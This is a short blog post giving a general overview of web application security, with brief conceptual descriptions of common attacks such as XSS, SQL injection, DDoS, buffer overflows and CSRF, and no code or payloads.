Web application security refers to a variety of processes, technologies, or methods for protecting web servers, web applications, and web services such as APIs from attack by Internet-based threats. Web application security is crucial to protecting data, customers, and organizations from data theft, interruptions in business continuity, or other harmful results of cybercrime.
Web application
security is a central component of any web-based business. The global nature of
the Internet exposes web properties to attack from different locations and
various levels of scale and complexity. Web application security deals with the
security of websites, web applications and web services such as APIs.
Common web application
security vulnerabilities
Attacks against web apps range from targeted database manipulation to
large-scale network disruption. The most common attacks include:
- Cross site scripting (XSS) - XSS is a vulnerability that allows an
attacker to inject client-side scripts into a webpage in order to access
important information directly, impersonate the user, or trick the user
into revealing important information.
- SQL injection (SQi) - SQi is a method by which an attacker
exploits vulnerabilities in the way a database executes search queries.
Attackers use SQi to gain access to unauthorized information, modify or
create new user permissions, or otherwise manipulate or destroy sensitive
data.
- Denial-of-service
(DoS) and distributed denial-of-service (DDoS) attacks - Through a variety of vectors, attackers are
able to overload a targeted server or its surrounding infrastructure with
different types of attack traffic. When a server is no longer able to
effectively process incoming requests, it begins to behave sluggishly and
eventually deny service to incoming requests from legitimate users.
- Memory corruption - Memory corruption occurs when a
location in memory is unintentionally modified, resulting in the potential
for unexpected behavior in the software. Bad actors will attempt to sniff
out and exploit memory corruption through exploits such as code injections
or buffer overflow attacks.
- Buffer overflow - Buffer overflow is an anomaly that
occurs when software writing data to a defined space in memory known as a
buffer. Overflowing the buffer’s capacity results in adjacent memory
locations being overwritten with data. This behavior can be exploited to
inject malicious code into memory, potentially creating vulnerability in
the targeted machine.
- Cross-site request forgery (CSRF) - Cross site request forgery involves
tricking a victim into making a request that utilizes their authentication
or authorization. By leveraging the account privileges of a user, an
attacker is able to send a request masquerading as the user. Once a user’s
account has been compromised, the attacker can destroy or modify important
information. Highly privileged accounts such as administrators or
executives are commonly targeted.
- Data breach - Different than specific attack vectors,
a data breach is a general term referring to the release of sensitive or
confidential information, and can occur through malicious actions or by
mistake. The scope of what is considered a data breach is fairly wide, and
may consist of a few highly valuable records all the way up to millions of
exposed user accounts.
No comments:
Post a Comment